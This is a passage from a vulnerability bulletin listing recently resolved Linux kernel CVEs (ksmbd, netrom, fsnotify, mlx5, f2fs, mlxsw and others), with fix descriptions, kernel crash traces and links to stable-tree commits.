| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksmbd: skip lock-range check on equal size to avoid size==0 underflow When size equals the current i_size (including 0), the code used to call check_lock_range(filp, i_size, size - 1, WRITE), which computes `size - 1` and can underflow for size==0. Skip the equal case. | 2026-01-13 | not yet calculated | CVE-2025-68786 | https://git.kernel.org/stable/c/52fcbb92e0d3acfd1448b2a43b6595d540da5295 https://git.kernel.org/stable/c/da29cd197246c85c0473259f1cad897d9d28faea https://git.kernel.org/stable/c/a6f4cfa3783804336491e0edcb250c25f9b59d33 https://git.kernel.org/stable/c/571204e4758a528fbd67330bd4b0dfbdafb33dd8 https://git.kernel.org/stable/c/5d510ac31626ed157d2182149559430350cf2104 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netrom: Fix memory leak in nr_sendmsg() syzbot reported a memory leak [1]. When the function sock_alloc_send_skb() returns NULL in nr_output(), the original skb, which was allocated in nr_sendmsg(), is not freed. Fix this by freeing it before returning. [1] BUG: memory leak unreferenced object 0xffff888129f35500 (size 240): comm "syz.0.17", pid 6119, jiffies 4294944652 hex dump (first 32 bytes): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 10 52 28 81 88 ff ff ..........R(.... backtrace (crc 1456a3e4): kmemleak_alloc_recursive include/linux/kmemleak.h:44 [inline] slab_post_alloc_hook mm/slub.c:4983 [inline] slab_alloc_node mm/slub.c:5288 [inline] kmem_cache_alloc_node_noprof+0x36f/0x5e0 mm/slub.c:5340 __alloc_skb+0x203/0x240 net/core/skbuff.c:660 alloc_skb include/linux/skbuff.h:1383 [inline] alloc_skb_with_frags+0x69/0x3f0 net/core/skbuff.c:6671 sock_alloc_send_pskb+0x379/0x3e0 net/core/sock.c:2965 sock_alloc_send_skb include/net/sock.h:1859 [inline] nr_sendmsg+0x287/0x450 net/netrom/af_netrom.c:1105 sock_sendmsg_nosec net/socket.c:727 [inline] __sock_sendmsg net/socket.c:742 [inline] sock_write_iter+0x293/0x2a0 net/socket.c:1195 new_sync_write fs/read_write.c:593 [inline] vfs_write+0x45d/0x710 fs/read_write.c:686 ksys_write+0x143/0x170 fs/read_write.c:738 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xa4/0xfa0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f | 2026-01-13 | not yet calculated | CVE-2025-68787 | https://git.kernel.org/stable/c/f77e538ac4e3adb1882d5bccb7bfdc111b5963d3 https://git.kernel.org/stable/c/09efbf54eeaecebe882af603c9939a4b1bb9567e https://git.kernel.org/stable/c/73839497bbde5cd4fd02bbd9c8bc2640780ae65d https://git.kernel.org/stable/c/156a0f6341dce634a825db49ca20b48b1ae9bcc1 https://git.kernel.org/stable/c/8d1ccba4b171cd504ecfa47349cb9864fc9d687c https://git.kernel.org/stable/c/51f5fbc1681bdcffcc7d18bf3dfdb2b1278d3977 https://git.kernel.org/stable/c/613d12dd794e078be8ff3cf6b62a6b9acf7f4619 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fsnotify: do not generate ACCESS/MODIFY events on child for special files inotify/fanotify do not allow users with no read access to a file to subscribe to events (e.g. IN_ACCESS/IN_MODIFY), but they do allow the same user to subscribe for watching events on children when the user has access to the parent directory (e.g. /dev). Users with no read access to a file but with read access to its parent directory can still stat the file and see if it was accessed/modified via atime/mtime change. The same is not true for special files (e.g. /dev/null). Users will not generally observe atime/mtime changes when other users read/write to special files, only when someone sets atime/mtime via utimensat(). Align fsnotify events with this stat behavior and do not generate ACCESS/MODIFY events to parent watchers on read/write of special files. The events are still generated to parent watchers on utimensat(). This closes some side-channels that could be possibly used for information exfiltration [1]. [1] https://snee.la/pdf/pubs/file-notification-attacks.pdf | 2026-01-13 | not yet calculated | CVE-2025-68788 | https://git.kernel.org/stable/c/df2711544b050aba703e6da418c53c7dc5d443ca https://git.kernel.org/stable/c/859bdf438f01d9aa7f84b09c1202d548c7cad9e8 https://git.kernel.org/stable/c/6a7d7d96eeeab7af2bd01afbb3d9878a11a13d91 https://git.kernel.org/stable/c/e0643d46759db8b84c0504a676043e5e341b6c81 https://git.kernel.org/stable/c/82f7416bcbd951549e758d15fc1a96a5afc2e900 https://git.kernel.org/stable/c/7a93edb23bcf07a3aaf8b598edfc2faa8fbcc0b6 https://git.kernel.org/stable/c/635bc4def026a24e071436f4f356ea08c0eed6ff |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hwmon: (ibmpex) fix use-after-free in high/low store The ibmpex_high_low_store() function retrieves driver data using dev_get_drvdata() and uses it without validation. This creates a race condition where the sysfs callback can be invoked after the data structure is freed, leading to use-after-free. Fix by adding a NULL check after dev_get_drvdata(), and reordering operations in the deletion path to prevent TOCTOU. | 2026-01-13 | not yet calculated | CVE-2025-68789 | https://git.kernel.org/stable/c/3ce9b7ae9d4d148672b35147aaf7987a4f82bb94 https://git.kernel.org/stable/c/533ead425f8109b02fecc7e72d612b8898ec347a https://git.kernel.org/stable/c/fa37adcf1d564ef58b9dfb01b6c36d35c5294bad https://git.kernel.org/stable/c/68d62e5bebbd118b763e8bb210d5cf2198ef450c https://git.kernel.org/stable/c/5aa2139201667c1f644601e4529c4acd6bf8db5a https://git.kernel.org/stable/c/6946c726c3f4c36f0f049e6f97e88c510b15f65d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5: Fix double unregister of HCA_PORTS component Clear hca_devcom_comp in device's private data after unregistering it in LAG teardown. Otherwise a slightly lagging second pass through mlx5_unload_one() might try to unregister it again and trip over a use-after-free. On s390 almost all PCI level recovery events trigger two passes through mlx5_unload_one() - one through the poll_health() method and one through mlx5_pci_err_detected() as callback from generic PCI error recovery. While testing PCI error recovery paths with more kernel debug features enabled, this issue reproducibly led to kernel panics with the following call chain: Unable to handle kernel pointer dereference in virtual kernel address space Failing address: 6b6b6b6b6b6b6000 TEID: 6b6b6b6b6b6b6803 ESOP-2 FSI Fault in home space mode while using kernel ASCE. AS:00000000705c4007 R3:0000000000000024 Oops: 0038 ilc:3 [#1]SMP CPU: 14 UID: 0 PID: 156 Comm: kmcheck Kdump: loaded Not tainted 6.18.0-20251130.rc7.git0.16131a59cab1.300.fc43.s390x+debug #1 PREEMPT Krnl PSW : 0404e00180000000 0000020fc86aa1dc (__lock_acquire+0x5c/0x15f0) R:0 T:1 IO:0 EX:0 Key:0 M:1 W:0 P:0 AS:3 CC:2 PM:0 RI:0 EA:3 Krnl GPRS: 0000000000000000 0000020f00000001 6b6b6b6b6b6b6c33 0000000000000000 0000000000000000 0000000000000000 0000000000000001 0000000000000000 0000000000000000 0000020fca28b820 0000000000000000 0000010a1ced8100 0000010a1ced8100 0000020fc9775068 0000018fce14f8b8 0000018fce14f7f8 Krnl Code: 0000020fc86aa1cc: e3b003400004 lg %r11,832 0000020fc86aa1d2: a7840211 brc 8,0000020fc86aa5f4 *0000020fc86aa1d6: c09000df0b25 larl %r9,0000020fca28b820 >0000020fc86aa1dc: d50790002000 clc 0(8,%r9),0(%r2) 0000020fc86aa1e2: a7840209 brc 8,0000020fc86aa5f4 0000020fc86aa1e6: c0e001100401 larl %r14,0000020fca8aa9e8 0000020fc86aa1ec: c01000e25a00 larl %r1,0000020fca2f55ec 0000020fc86aa1f2: a7eb00e8 aghi %r14,232 Call Trace: __lock_acquire+0x5c/0x15f0 lock_acquire.part.0+0xf8/0x270 lock_acquire+0xb0/0x1b0 down_write+0x5a/0x250 mlx5_detach_device+0x42/0x110 [mlx5_core] mlx5_unload_one_devl_locked+0x50/0xc0 [mlx5_core] mlx5_unload_one+0x42/0x60 [mlx5_core] mlx5_pci_err_detected+0x94/0x150 [mlx5_core] zpci_event_attempt_error_recovery+0xcc/0x388 | 2026-01-13 | not yet calculated | CVE-2025-68790 | https://git.kernel.org/stable/c/d2495f529d60e8e8c43e6ad524089c38b8be7bc4 https://git.kernel.org/stable/c/6a107cfe9c99a079e578a4c5eb70038101a3599f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fuse: missing copy_finish in fuse-over-io-uring argument copies Fix a possible reference count leak of payload pages during fuse argument copies. [Joanne: simplified error cleanup] | 2026-01-13 | not yet calculated | CVE-2025-68791 | https://git.kernel.org/stable/c/b79938863f436960eff209130f025c4bd3026bf8 https://git.kernel.org/stable/c/6e0d7f7f4a43ac8868e98c87ecf48805aa8c24dd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tpm2-sessions: Fix out of range indexing in name_size 'name_size' does not have any range checks, and it just directly indexes with TPM_ALG_ID, which could lead to memory corruption at worst. Address the issue by only processing known values and returning -EINVAL for unrecognized values. Also make 'tpm_buf_append_name' and 'tpm_buf_fill_hmac_session' fallible so that errors are detected before causing any spurious TPM traffic. Also end the authorization session on failure in both of the functions, as the session state would then by definition be corrupted. | 2026-01-13 | not yet calculated | CVE-2025-68792 | https://git.kernel.org/stable/c/47e676ce4d68f461dfcab906f6aeb254f7276deb https://git.kernel.org/stable/c/04a3aa6e8c5f878cc51a8a1c90b6d3c54079bc43 https://git.kernel.org/stable/c/6e9722e9a7bfe1bbad649937c811076acf86e1fd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: fix a job->pasid access race in gpu recovery Avoid a possible UAF in GPU recovery due to a race between the sched timeout callback and the tdr work queue. The gpu recovery function calls drm_sched_stop() and later drm_sched_start(). drm_sched_start() restarts the tdr queue which will eventually free the job. If the tdr queue frees the job before the timeout callback completes, the job will be freed and we'll get a UAF when accessing the pasid. Cache it early to avoid the UAF. Example KASAN trace: [ 493.058141] BUG: KASAN: slab-use-after-free in amdgpu_device_gpu_recover+0x968/0x990 [amdgpu] [ 493.067530] Read of size 4 at addr ffff88b0ce3f794c by task kworker/u128:1/323 [ 493.074892] [ 493.076485] CPU: 9 UID: 0 PID: 323 Comm: kworker/u128:1 Tainted: G E 6.16.0-1289896.2.zuul.bf4f11df81c1410bbe901c4373305a31 #1 PREEMPT(voluntary) [ 493.076493] Tainted: [E]=UNSIGNED_MODULE [ 493.076495] Hardware name: TYAN B8021G88V2HR-2T/S8021GM2NR-2T, BIOS V1.03.B10 04/01/2019 [ 493.076500] Workqueue: amdgpu-reset-dev drm_sched_job_timedout [gpu_sched] [ 493.076512] Call Trace: [ 493.076515] <TASK> [ 493.076518] dump_stack_lvl+0x64/0x80 [ 493.076529] print_report+0xce/0x630 [ 493.076536] ? _raw_spin_lock_irqsave+0x86/0xd0 [ 493.076541] ? __pfx__raw_spin_lock_irqsave+0x10/0x10 [ 493.076545] ? amdgpu_device_gpu_recover+0x968/0x990 [amdgpu] [ 493.077253] kasan_report+0xb8/0xf0 [ 493.077258] ? amdgpu_device_gpu_recover+0x968/0x990 [amdgpu] [ 493.077965] amdgpu_device_gpu_recover+0x968/0x990 [amdgpu] [ 493.078672] ? __pfx_amdgpu_device_gpu_recover+0x10/0x10 [amdgpu] [ 493.079378] ? amdgpu_coredump+0x1fd/0x4c0 [amdgpu] [ 493.080111] amdgpu_job_timedout+0x642/0x1400 [amdgpu] [ 493.080903] ? pick_task_fair+0x24e/0x330 [ 493.080910] ? __pfx_amdgpu_job_timedout+0x10/0x10 [amdgpu] [ 493.081702] ? _raw_spin_lock+0x75/0xc0 [ 493.081708] ? __pfx__raw_spin_lock+0x10/0x10 [ 493.081712] drm_sched_job_timedout+0x1b0/0x4b0 [gpu_sched] [ 493.081721] ? __pfx__raw_spin_lock_irq+0x10/0x10 [ 493.081725] process_one_work+0x679/0xff0 [ 493.081732] worker_thread+0x6ce/0xfd0 [ 493.081736] ? __pfx_worker_thread+0x10/0x10 [ 493.081739] kthread+0x376/0x730 [ 493.081744] ? __pfx_kthread+0x10/0x10 [ 493.081748] ? __pfx__raw_spin_lock_irq+0x10/0x10 [ 493.081751] ? __pfx_kthread+0x10/0x10 [ 493.081755] ret_from_fork+0x247/0x330 [ 493.081761] ? __pfx_kthread+0x10/0x10 [ 493.081764] ret_from_fork_asm+0x1a/0x30 [ 493.081771] </TASK> (cherry picked from commit 20880a3fd5dd7bca1a079534cf6596bda92e107d) | 2026-01-13 | not yet calculated | CVE-2025-68793 | https://git.kernel.org/stable/c/dac58c012c47cadf337a35eb05d44498c43e5cd0 https://git.kernel.org/stable/c/77f73253015cbc7893fca1821ac3eae9eb4bc943 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iomap: adjust read range correctly for non-block-aligned positions iomap_adjust_read_range() assumes that the position and length passed in are block-aligned. This is not always the case however, as shown in the syzbot generated case for erofs. This causes too many bytes to be skipped for uptodate blocks, which results in returning the incorrect position and length to read in. If all the blocks are uptodate, this underflows length and returns a position beyond the folio. Fix the calculation to also take into account the block offset when calculating how many bytes can be skipped for uptodate blocks. | 2026-01-13 | not yet calculated | CVE-2025-68794 | https://git.kernel.org/stable/c/82b60ffbb532d919959702768dca04c3c0500ae5 https://git.kernel.org/stable/c/12053695c8ef5410e8cc6c9ed4c0db9cd9c82b3e https://git.kernel.org/stable/c/142194fb21afe964d2d194cab1fc357cbf87e899 https://git.kernel.org/stable/c/7aa6bc3e8766990824f66ca76c19596ce10daf3e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ethtool: Avoid overflowing userspace buffer on stats query The ethtool -S command operates across three ioctl calls: ETHTOOL_GSSET_INFO for the size, ETHTOOL_GSTRINGS for the names, and ETHTOOL_GSTATS for the values. If the number of stats changes between these calls (e.g., due to device reconfiguration), userspace's buffer allocation will be incorrect, potentially leading to buffer overflow. Drivers are generally expected to maintain stable stat counts, but some drivers (e.g., mlx5, bnx2x, bna, ksz884x) use dynamic counters, making this scenario possible. Some drivers try to handle this internally: - bnad_get_ethtool_stats() returns early in case stats.n_stats is not equal to the driver's stats count. - micrel/ksz884x also makes sure not to write anything beyond stats.n_stats and overflow the buffer. However, both use stats.n_stats which is already assigned with the value returned from get_sset_count(), hence won't solve the issue described here. Change ethtool_get_strings(), ethtool_get_stats(), ethtool_get_phy_stats() to not return anything in case of a mismatch between userspace's size and get_sset_size(), to prevent buffer overflow. The returned n_stats value will be equal to zero, to reflect that nothing has been returned. This could result in one of two cases when using upstream ethtool, depending on when the size change is detected: 1. When detected in ethtool_get_strings(): # ethtool -S eth2 no stats available 2. When detected in get stats, all stats will be reported as zero. Both cases are presumably transient, and a subsequent ethtool call should succeed. Other than the overflow avoidance, these two cases are very evident (no output/cleared stats), which is arguably better than presenting incorrect/shifted stats. I also considered returning an error instead of a "silent" response, but that seems more destructive towards userspace apps. Notes: - This patch does not claim to fix the inherent race, it only makes sure that we do not overflow the userspace buffer, and makes for a more predictable behavior. - RTNL lock is held during each ioctl, the race window exists between the separate ioctl calls when the lock is released. - Userspace ethtool always fills stats.n_stats, but it is likely that these stats ioctls are implemented in other userspace applications which might not fill it. The added code checks that it's not zero, to prevent any regressions. | 2026-01-13 | not yet calculated | CVE-2025-68795 | https://git.kernel.org/stable/c/3df375a1e75483b7d973c3cc2e46aa374db8428b https://git.kernel.org/stable/c/f9dc0f45d2cd0189ce666288a29d2cc32c2e44d5 https://git.kernel.org/stable/c/4afcb985355210e1688560dc47e64b94dad35d71 https://git.kernel.org/stable/c/ca9983bc3a1189bd72f9ae449d925a66b2616326 https://git.kernel.org/stable/c/7bea09f60f2ad5d232e2db8f1c14e850fd3fd416 https://git.kernel.org/stable/c/4066b5b546293f44cd6d0e84ece6e3ee7ff27093 https://git.kernel.org/stable/c/7b07be1ff1cb6c49869910518650e8d0abc7d25f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: fix to avoid updating zero-sized extent in extent cache As syzbot reported: F2FS-fs (loop0): __update_extent_tree_range: extent len is zero, type: 0, extent [0, 0, 0], age [0, 0] ------------[ cut here ]------------ kernel BUG at fs/f2fs/extent_cache.c:678! Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI CPU: 0 UID: 0 PID: 5336 Comm: syz.0.0 Not tainted syzkaller #0 PREEMPT(full) Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014 RIP: 0010:__update_extent_tree_range+0x13bc/0x1500 fs/f2fs/extent_cache.c:678 Call Trace: <TASK> f2fs_update_read_extent_cache_range+0x192/0x3e0 fs/f2fs/extent_cache.c:1085 f2fs_do_zero_range fs/f2fs/file.c:1657 [inline] f2fs_zero_range+0x10c1/0x1580 fs/f2fs/file.c:1737 f2fs_fallocate+0x583/0x990 fs/f2fs/file.c:2030 vfs_fallocate+0x669/0x7e0 fs/open.c:342 ioctl_preallocate fs/ioctl.c:289 [inline] file_ioctl+0x611/0x780 fs/ioctl.c:-1 do_vfs_ioctl+0xb33/0x1430 fs/ioctl.c:576 __do_sys_ioctl fs/ioctl.c:595 [inline] __se_sys_ioctl+0x82/0x170 fs/ioctl.c:583 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xfa/0x3b0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f07bc58eec9 In the error path of f2fs_zero_range(), it may add a zero-sized extent into the extent cache, which should be avoided. | 2026-01-13 | not yet calculated | CVE-2025-68796 | https://git.kernel.org/stable/c/9c07bd262c13ca922adad6e7613d48505f97f548 https://git.kernel.org/stable/c/72c58a82e6fb7b327e8701f5786c70c3edc56188 https://git.kernel.org/stable/c/e50b81c50fcbe63f50405bb40f262162ff32af88 https://git.kernel.org/stable/c/efe3371001f50a2d6f746b50bdc6f9f26b2089ec https://git.kernel.org/stable/c/4f244c64efe628d277b916f47071adf480eb8646 https://git.kernel.org/stable/c/bac23833220a1f8fe8dfab7e16efa20ff64d7589 https://git.kernel.org/stable/c/7c37c79510329cd951a4dedf3f7bf7e2b18dccec |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: char: applicom: fix NULL pointer dereference in ac_ioctl Discovered by Atuin - Automated Vulnerability Discovery Engine. In ac_ioctl, the validation of IndexCard and the check for a valid RamIO pointer are skipped when cmd is 6. However, the function unconditionally executes readb(apbs[IndexCard].RamIO + VERS) at the end. If cmd is 6, IndexCard may reference a board that does not exist (where RamIO is NULL), leading to a NULL pointer dereference. Fix this by skipping the readb access when cmd is 6, as this command is a global information query and does not target a specific board context. | 2026-01-13 | not yet calculated | CVE-2025-68797 | https://git.kernel.org/stable/c/5a6240804fb7bbd4f5f6e706955248a6f4c1abbc https://git.kernel.org/stable/c/d1b0452280029d05a98c75631131ee61c0b0d084 https://git.kernel.org/stable/c/0b8b353e09888bccee405e0dd6feafb60360f478 https://git.kernel.org/stable/c/d285517429a75423789e6408653e57b6fdfc8e54 https://git.kernel.org/stable/c/74883565c621eec6cd2e35fe6d27454cf2810c23 https://git.kernel.org/stable/c/f83e3e9f89181b42f6076a115d767a7552c4a39e https://git.kernel.org/stable/c/82d12088c297fa1cef670e1718b3d24f414c23f7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: perf/x86/amd: Check event before enable to avoid GPF On AMD machines cpuc->events[idx] can become NULL in a subtle race condition with NMI->throttle->x86_pmu_stop(). Check event for NULL in amd_pmu_enable_all() before enable to avoid a GPF. This appears to be an AMD only issue. Syzkaller reported a GPF in amd_pmu_enable_all. INFO: NMI handler (perf_event_nmi_handler) took too long to run: 13.143 msecs Oops: general protection fault, probably for non-canonical address 0xdffffc0000000034: 0000 PREEMPT SMP KASAN NOPTI KASAN: null-ptr-deref in range [0x00000000000001a0-0x00000000000001a7] CPU: 0 UID: 0 PID: 328415 Comm: repro_36674776 Not tainted 6.12.0-rc1-syzk RIP: 0010:x86_pmu_enable_event (arch/x86/events/perf_event.h:1195 arch/x86/events/core.c:1430) RSP: 0018:ffff888118009d60 EFLAGS: 00010012 RAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000000 RDX: 0000000000000034 RSI: 0000000000000000 RDI: 00000000000001a0 RBP: 0000000000000001 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000002 R13: ffff88811802a440 R14: ffff88811802a240 R15: ffff8881132d8601 FS: 00007f097dfaa700(0000) GS:ffff888118000000(0000) GS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00000000200001c0 CR3: 0000000103d56000 CR4: 00000000000006f0 Call Trace: <IRQ> amd_pmu_enable_all (arch/x86/events/amd/core.c:760 (discriminator 2)) x86_pmu_enable (arch/x86/events/core.c:1360) event_sched_out (kernel/events/core.c:1191 kernel/events/core.c:1186 kernel/events/core.c:2346) __perf_remove_from_context (kernel/events/core.c:2435) event_function (kernel/events/core.c:259) remote_function (kernel/events/core.c:92 (discriminator 1) kernel/events/core.c:72 (discriminator 1)) __flush_smp_call_function_queue (./arch/x86/include/asm/jump_label.h:27 ./include/linux/jump_label.h:207 ./include/trace/events/csd.h:64 kernel/smp.c:135 kernel/smp.c:540) __sysvec_call_function_single (./arch/x86/include/asm/jump_label.h:27 ./include/linux/jump_label.h:207 ./arch/x86/include/asm/trace/irq_vectors.h:99 arch/x86/kernel/smp.c:272) sysvec_call_function_single (arch/x86/kernel/smp.c:266 (discriminator 47) arch/x86/kernel/smp.c:266 (discriminator 47)) </IRQ> | 2026-01-13 | not yet calculated | CVE-2025-68798 | https://git.kernel.org/stable/c/49324a0c40f7e9bae1bd0362d23fc42232e14621 https://git.kernel.org/stable/c/6e41d9ec8d7cc3f01b9ba785e05f0ebef8b3b37f https://git.kernel.org/stable/c/e1028fb38b328084bc683a4efb001c95d3108573 https://git.kernel.org/stable/c/43c2e5c2acaae50e99d1c20a5a46e367c442fb3b https://git.kernel.org/stable/c/866cf36bfee4fba6a492d2dcc5133f857e3446b0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: caif: fix integer underflow in cffrml_receive() The cffrml_receive() function extracts a length field from the packet header and, when FCS is disabled, subtracts 2 from this length without validating that len >= 2. If an attacker sends a malicious packet with a length field of 0 or 1 to an interface with FCS disabled, the subtraction causes an integer underflow. This can lead to memory exhaustion and kernel instability, and to potential information disclosure if padding contains uninitialized kernel memory. Fix this by validating that len >= 2 before performing the subtraction. | 2026-01-13 | not yet calculated | CVE-2025-68799 | https://git.kernel.org/stable/c/f407f1c9f45bbf5c99fd80b3f3f4a94fdbe35691 https://git.kernel.org/stable/c/c54091eec6fed19e94182aa05dd6846600a642f7 https://git.kernel.org/stable/c/785c7be6361630070790f6235b696da156ac71b3 https://git.kernel.org/stable/c/f818cd472565f8b0c2c409b040e0121c5cf8592c https://git.kernel.org/stable/c/4ec29714aa4e0601ea29d2f02b461fc0ac92c2c3 https://git.kernel.org/stable/c/21fdcc00656a60af3c7aae2dea8dd96abd35519c https://git.kernel.org/stable/c/8a11ff0948b5ad09b71896b7ccc850625f9878d1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats Cited commit added a dedicated mutex (instead of RTNL) to protect the multicast route list, so that it will not change while the driver periodically traverses it in order to update the kernel about multicast route stats that were queried from the device. One instance of list entry deletion (during route replace) was missed and it can result in a use-after-free [1]. Fix by acquiring the mutex before deleting the entry from the list and releasing it afterwards. [1] BUG: KASAN: slab-use-after-free in mlxsw_sp_mr_stats_update+0x4a5/0x540 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:1006 [mlxsw_spectrum] Read of size 8 at addr ffff8881523c2fa8 by task kworker/2:5/22043 CPU: 2 UID: 0 PID: 22043 Comm: kworker/2:5 Not tainted 6.18.0-rc1-custom-g1a3d6d7cd014 #1 PREEMPT(full) Hardware name: Mellanox Technologies Ltd. MSN2010/SA002610, BIOS 5.6.5 08/24/2017 Workqueue: mlxsw_core mlxsw_sp_mr_stats_update [mlxsw_spectrum] Call Trace: <TASK> dump_stack_lvl+0xba/0x110 print_report+0x174/0x4f5 kasan_report+0xdf/0x110 mlxsw_sp_mr_stats_update+0x4a5/0x540 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:1006 [mlxsw_spectrum] process_one_work+0x9cc/0x18e0 worker_thread+0x5df/0xe40 kthread+0x3b8/0x730 ret_from_fork+0x3e9/0x560 ret_from_fork_asm+0x1a/0x30 </TASK> Allocated by task 29933: kasan_save_stack+0x30/0x50 kasan_save_track+0x14/0x30 __kasan_kmalloc+0x8f/0xa0 mlxsw_sp_mr_route_add+0xd8/0x4770 [mlxsw_spectrum] mlxsw_sp_router_fibmr_event_work+0x371/0xad0 drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:7965 [mlxsw_spectrum] process_one_work+0x9cc/0x18e0 worker_thread+0x5df/0xe40 kthread+0x3b8/0x730 ret_from_fork+0x3e9/0x560 ret_from_fork_asm+0x1a/0x30 Freed by task 29933: kasan_save_stack+0x30/0x50 kasan_save_track+0x14/0x30 __kasan_save_free_info+0x3b/0x70 __kasan_slab_free+0x43/0x70 kfree+0x14e/0x700 mlxsw_sp_mr_route_add+0x2dea/0x4770 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:444 [mlxsw_spectrum] mlxsw_sp_router_fibmr_event_work+0x371/0xad0 drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:7965 [mlxsw_spectrum] process_one_work+0x9cc/0x18e0 worker_thread+0x5df/0xe40 kthread+0x3b8/0x730 ret_from_fork+0x3e9/0x560 ret_from_fork_asm+0x1a/0x30 | 2026-01-13 | not yet calculated | CVE-2025-68800 | https://git.kernel.org/stable/c/b957366f5611bbaba03dd10ef861283347ddcc88 https://git.kernel.org/stable/c/6e367c361a523a4b54fe618215c64a0ee189caf0 https://git.kernel.org/stable/c/37ca08b35a27ce8fd8e74dd3fd2ae21c23b63b73 https://git.kernel.org/stable/c/5f2831fc593c2b2efbff7dd0dd7441cec76adcd5 https://git.kernel.org/stable/c/216afc198484fde110ebeafc017992266f4596ce https://git.kernel.org/stable/c/4049a6ace209f4ed150429f86ae796d7d6a4c22b https://git.kernel.org/stable/c/8ac1dacec458f55f871f7153242ed6ab60373b90 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mlxsw: spectrum_router: Fix neighbour use-after-free We sometimes observe use-after-free when dereferencing a neighbour [1]. The problem seems to be that the driver stores a pointer to the neighbour, but without holding a reference on it. A reference is only taken when the neighbour is used by a nexthop. Fix by simplifying the reference counting scheme. Always take a reference when storing a neighbour pointer in a neighbour entry. Avoid taking a reference when the neighbour is used by a nexthop, as the neighbour entry associated with the nexthop already holds a reference. Tested by running the test that uncovered the problem over 300 times. Without this patch the problem was reproduced after a handful of iterations. [1] BUG: KASAN: slab-use-after-free in mlxsw_sp_neigh_entry_update+0x2d4/0x310 Read of size 8 at addr ffff88817f8e3420 by task ip/3929 CPU: 3 UID: 0 PID: 3929 Comm: ip Not tainted 6.18.0-rc4-virtme-g36b21a067510 #3 PREEMPT(full) Hardware name: Nvidia SN5600/VMOD0013, BIOS 5.13 05/31/2023 Call Trace: <TASK> dump_stack_lvl+0x6f/0xa0 print_address_description.constprop.0+0x6e/0x300 print_report+0xfc/0x1fb kasan_report+0xe4/0x110 mlxsw_sp_neigh_entry_update+0x2d4/0x310 mlxsw_sp_router_rif_gone_sync+0x35f/0x510 mlxsw_sp_rif_destroy+0x1ea/0x730 mlxsw_sp_inetaddr_port_vlan_event+0xa1/0x1b0 __mlxsw_sp_inetaddr_lag_event+0xcc/0x130 __mlxsw_sp_inetaddr_event+0xf5/0x3c0 mlxsw_sp_router_netdevice_event+0x1015/0x1580 notifier_call_chain+0xcc/0x150 call_netdevice_notifiers_info+0x7e/0x100 __netdev_upper_dev_unlink+0x10b/0x210 netdev_upper_dev_unlink+0x79/0xa0 vrf_del_slave+0x18/0x50 do_set_master+0x146/0x7d0 do_setlink.isra.0+0x9a0/0x2880 rtnl_newlink+0x637/0xb20 rtnetlink_rcv_msg+0x6fe/0xb90 netlink_rcv_skb+0x123/0x380 netlink_unicast+0x4a3/0x770 netlink_sendmsg+0x75b/0xc90 __sock_sendmsg+0xbe/0x160 ____sys_sendmsg+0x5b2/0x7d0 ___sys_sendmsg+0xfd/0x180 __sys_sendmsg+0x124/0x1c0 do_syscall_64+0xbb/0xfd0 entry_SYSCALL_64_after_hwframe+0x4b/0x53 [...] Allocated by task 109: kasan_save_stack+0x30/0x50 kasan_save_track+0x14/0x30 __kasan_kmalloc+0x7b/0x90 __kmalloc_noprof+0x2c1/0x790 neigh_alloc+0x6af/0x8f0 ___neigh_create+0x63/0xe90 mlxsw_sp_nexthop_neigh_init+0x430/0x7e0 mlxsw_sp_nexthop_type_init+0x212/0x960 mlxsw_sp_nexthop6_group_info_init.constprop.0+0x81f/0x1280 mlxsw_sp_nexthop6_group_get+0x392/0x6a0 mlxsw_sp_fib6_entry_create+0x46a/0xfd0 mlxsw_sp_router_fib6_replace+0x1ed/0x5f0 mlxsw_sp_router_fib6_event_work+0x10a/0x2a0 process_one_work+0xd57/0x1390 worker_thread+0x4d6/0xd40 kthread+0x355/0x5b0 ret_from_fork+0x1d4/0x270 ret_from_fork_asm+0x11/0x20 Freed by task 154: kasan_save_stack+0x30/0x50 kasan_save_track+0x14/0x30 __kasan_save_free_info+0x3b/0x60 __kasan_slab_free+0x43/0x70 kmem_cache_free_bulk.part.0+0x1eb/0x5e0 kvfree_rcu_bulk+0x1f2/0x260 kfree_rcu_work+0x130/0x1b0 process_one_work+0xd57/0x1390 worker_thread+0x4d6/0xd40 kthread+0x355/0x5b0 ret_from_fork+0x1d4/0x270 ret_from_fork_asm+0x11/0x20 Last potentially related work creation: kasan_save_stack+0x30/0x50 kasan_record_aux_stack+0x8c/0xa0 